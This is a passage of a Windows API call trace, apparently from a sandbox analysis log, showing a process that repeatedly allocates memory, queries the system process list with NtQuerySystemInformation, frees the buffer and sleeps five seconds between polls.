ResultLength=0x0) returned 0x0 [0233.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.352] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.455] NtAllocateVirtualMemory (in: 